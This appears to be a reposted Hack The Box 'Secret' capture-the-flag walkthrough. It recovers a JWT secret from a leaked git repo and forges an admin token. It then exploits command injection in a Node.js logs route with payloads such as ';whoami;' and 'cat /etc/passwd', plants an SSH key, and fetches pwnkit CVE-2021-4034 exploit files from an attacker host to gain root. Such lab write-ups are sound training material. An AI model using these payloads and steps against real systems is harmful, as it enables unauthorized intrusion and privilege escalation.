[Hack The Box] HTB—Secret walkthrough

2022-02-25 09:05:54  Views: 996  Source: Internet



Machine: Hack The Box—Secret


I. Information gathering

nmap

nmap -sV 10.10.11.120

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
3000/tcp open  http    Node.js (Express middleware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Detailed scan of the open ports

nmap -sC -sV -n -T5 -p 22,80,3000 10.10.11.120

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:af:61:44:10:89:b9:53:f0:80:3f:d7:19:b1:e2:9c (RSA)
|   256 95:ed:65:8d:cd:08:2b:55:dd:17:51:31:1e:3e:18:12 (ECDSA)
|_  256 33:7b:c1:71:d3:33:0f:92:4e:83:5a:1f:52:02:93:5e (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-title: DUMB Docs
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp open  http    Node.js (Express middleware)
|_http-title: DUMB Docs
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

II. Web exploitation

Following the API documentation, register with curl:

curl -i -X POST \
  -H 'Content-Type: application/json' \
  -d '{"name":"xiaozz", "email":"xiaoz@dasith.works", "password":"xiaoz1234"}' \
  http://10.10.11.120:3000/api/user/register

Log in:

curl -i -X POST \
  -H 'Content-Type: application/json' \
  -d '{"email":"xiaoz@dasith.works", "password":"xiaoz1234"}' \
  http://10.10.11.120:3000/api/user/login

auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjE2ZWM3NmQ1NzVhNDA0NWM5MTAzMTEiLCJuYW1lIjoieGlhb3p6IiwiZW1haWwiOiJ4aWFvekBkYXNpdGgud29ya3MiLCJpYXQiOjE2NDU2Njk2NDZ9.dQlJD5uraui5jzOJRvqdJ_5c4PARMhbYbMW-pAz4Ixs

Authenticate with this token in the auth-token header.


1. JWT forgery

We need admin privileges, so try to bypass the JWT using jwt.io.

Found the secret in .env:

DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web'
TOKEN_SECRET = secret

TOKEN_SECRET = secret is not the right value. There is a git leak, so try recovering the repository from .git; I found a handy tool for this: gakki429/Git_Extract: a tool to extract a leaked remote git repository or a local git repository (github.com)

python2 git_extract.py ../.git 

Found the real TOKEN_SECRET:

DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web'
TOKEN_SECRET = gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE

Relating this to the code in local-web\routes\private.js:

router.get('/logs', verifytoken, (req, res) => {
    const file = req.query.file;             // user-controlled query parameter
    const userinfo = { name: req.user }
    const name = userinfo.name.name;         // "name" claim taken straight from the JWT

    if (name == 'theadmin'){
        const getLogs = `git log --oneline ${file}`;   // interpolated into a shell command line
        exec(getLogs, (err, output) => {
            if(err){
                res.status(500).send(err);
                return
            }
            res.json(output);
        })
    }
    else{
        res.json({
            role: {
                role: "you are normal user",
                desc: userinfo.name.name
            }
        })
    }
})

The check is name == 'theadmin', so modify the name claim in the JWT.

Admin JWT:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjE2ZWM3NmQ1NzVhNDA0NWM5MTAzMTEiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRoZWFkbWluQGRhc2l0aC53b3JrcyIsImlhdCI6MTY0NTY2OTY0Nn0.La5fUzvIGE9T_ibOX37_D_ImqzR3fW6RjGMcr4wiRW4

Successfully logged in as admin; once logged in, look at http://10.10.11.120:3000/api/logs


2. Command execution

const getLogs = `git log --oneline ${file}`; this line in private.js gives command execution:

http://10.10.11.120:3000/api/logs?file=123;whoami;

The reverse shell failed; other writeups write an SSH public key instead (looking at /etc/passwd, the user we are currently running as has a login shell).

curl -i \
  -H 'auth-token:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjE2ZWM3NmQ1NzVhNDA0NWM5MTAzMTEiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRoZWFkbWluQGRhc2l0aC53b3JrcyIsImlhdCI6MTY0NTY2OTY0Nn0.La5fUzvIGE9T_ibOX37_D_ImqzR3fW6RjGMcr4wiRW4' \
  'http://10.10.11.120/api/logs?file=index.js;id;cat+/etc/passwd' | sed 's/\\n/\n/g'

sed 's/\\n/\n/g' turns the escaped newlines in the JSON response into real line breaks.



3. Write an SSH public key

On the Kali attacking machine:

ssh-keygen -t rsa                     # generate an SSH key pair on the attacking machine; leave the passphrase empty
cd /root/.ssh
export PUBLIC_KEY=$(cat id_rsa.pub)   # store the public key contents in a bash variable

Then the commands to run on the target:

mkdir -p /home/dasith/.ssh
echo $PUBLIC_KEY >> /home/dasith/.ssh/authorized_keys

With curl:

curl -i \
  -H 'auth-token:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjE2ZWM3NmQ1NzVhNDA0NWM5MTAzMTEiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRoZWFkbWluQGRhc2l0aC53b3JrcyIsImlhdCI6MTY0NTY2OTY0Nn0.La5fUzvIGE9T_ibOX37_D_ImqzR3fW6RjGMcr4wiRW4' \
  -G \
  --data-urlencode "file=123;mkdir -p /home/dasith/.ssh;echo $PUBLIC_KEY >> /home/dasith/.ssh/authorized_keys" \
  'http://10.10.11.120/api/logs'

-i shows the response headers; -G sends the data as GET query parameters; --data-urlencode URL-encodes the file parameter.

SSH login:

ssh dasith@10.10.11.120

Got the user flag.


III. Privilege escalation

As usual, run linpeas.sh.

pkexec is vulnerable to CVE-2021-4034 (local privilege escalation).

Start an HTTP server:

python3 -m http.server 8080

Transfer the files to the target:

wget http://10.10.14.25:8080/Makefile
wget http://10.10.14.25:8080/cve-2021-4034.c
wget http://10.10.14.25:8080/pwnkit.c
make
./cve-2021-4034

Got the root flag.


Reference writeup:

https://drt.sh/posts/htb-secret/

Source: https://blog.csdn.net/weixin_46081055/article/details/123115290
